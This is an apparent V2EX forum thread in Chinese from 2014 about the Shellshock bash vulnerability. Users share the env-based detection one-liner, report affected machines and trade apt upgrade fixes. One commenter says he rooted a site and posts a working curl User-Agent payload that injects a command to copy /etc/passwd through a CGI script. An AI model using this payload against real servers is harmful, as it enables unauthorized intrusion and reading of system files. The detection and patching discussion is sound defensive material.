bash 的漏洞,你们中招了吗?

2014-09-25 11:31:44 +08:00
 windyboy
http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x

检测:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
中招的显示:

vulnerable
this is a test

如果是没有问题,则是下面
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
9077 次点击
所在节点    分享发现
44 条回复
Earthman
2014-09-25 11:35:24 +08:00
debian sid中招
Bakemono
2014-09-25 11:39:16 +08:00
影响范围很大的。
我已经成功复现本地搭建的 cgi-bin 的网站,执行命令并且回显,目测很多都会沦陷掉..
lu18887
2014-09-25 11:46:06 +08:00
@Bakemono 有这么严重?只有自己用的服务器都不行?
jimmy2010
2014-09-25 11:46:33 +08:00
@Bakemono 有具体执行的细节么,我也想测试一下我的网站。debian nginx php fast-cgi
ccbikai
2014-09-25 11:54:34 +08:00
手里的五台都中………………
ryon
2014-09-25 12:03:18 +08:00
有修复方案了么
icevil
2014-09-25 12:05:46 +08:00
chenshaoju
2014-09-25 12:05:56 +08:00
14
2014-09-25 12:07:55 +08:00
sudo apt-get update && sudo apt-get updrade 检测到bash更新,更新之后就好了~
mml
2014-09-25 12:16:58 +08:00
这个补丁还是有问题,继续关注等更新吧。
moname
2014-09-25 12:19:51 +08:00
一早起来就update了
cielpy
2014-09-25 12:23:00 +08:00
中招了。。
orzfly
2014-09-25 12:37:00 +08:00
@14 其实可以省略 -get
apt update && apt upgrade
14
2014-09-25 12:38:46 +08:00
@orzfly 赞!现在才知道
Bakemono
2014-09-25 13:10:55 +08:00
@jimmy2010 php不必担心的样子
@lu18887 挺严重的,我已经测试某网站并且root掉了..

具体细节..>_>
curl -A'() { :; }; /bin/cat /etc/passwd > /tmp/test' http://192.168.0.1/poc.cgi
loveminds
2014-09-25 13:12:28 +08:00
没记错的话bash应该不是setuid的程序吧
lightforce
2014-09-25 13:12:42 +08:00
env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
GTim
2014-09-25 13:23:36 +08:00
我的macbook 肿么办
q397064399
2014-09-25 13:29:44 +08:00
@GTim 这个貌似也得先取得user权限吧
q397064399
2014-09-25 13:38:19 +08:00
@Bakemono 如何利用? 用php先取得用户权限 执行shell 然后用这个漏洞提升到root?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/135597

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX